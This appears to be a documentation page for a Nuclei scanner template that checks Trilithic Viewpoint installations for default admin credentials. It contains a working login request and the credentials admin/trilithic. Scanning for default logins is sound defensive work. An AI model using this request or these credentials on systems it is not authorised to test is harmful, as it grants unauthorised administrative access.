Trilithic Viewpoint Default Login
ID: trilithic-viewpoint-default
Severity: high
Author: davidmckennirey
Tags: default-login,trilithic,viewpoint
Description
Section titled “Description”Trilithic Viewpoint application default admin credentials were discovered. Note this product has been discontinued.
YAML Source
Section titled “YAML Source”id: trilithic-viewpoint-default
info: name: Trilithic Viewpoint Default Login author: davidmckennirey severity: high description: Trilithic Viewpoint application default admin credentials were discovered. Note this product has been discontinued. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 metadata: max-request: 1 tags: default-login,trilithic,viewpoint
http: - raw: - | POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1 Host: {{Hostname}} Content-Type: application/json Cookie: trilithic_win_auth=false
{u:"{{username}}", t:"undefined", p:"{{password}}", d:"", r:false, w:false}
payloads: username: - admin password: - trilithic attack: pitchfork
matchers-condition: and matchers: - type: status status: - 200
- type: word words: - '"authorized":true' - 'redirectUrl' part: body condition: and# digest: 4b0a00483046022100e649d59402e8a05edd4fbc7338f881baebfffe43670ce6053da1804bd30d5660022100f19a752be6d979f63c6d1d4ba549d9da7fbca3e10d45fc2acc06ffe4efa23d83:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/default-logins/viewpoint/trilithic-viewpoint-login.yaml"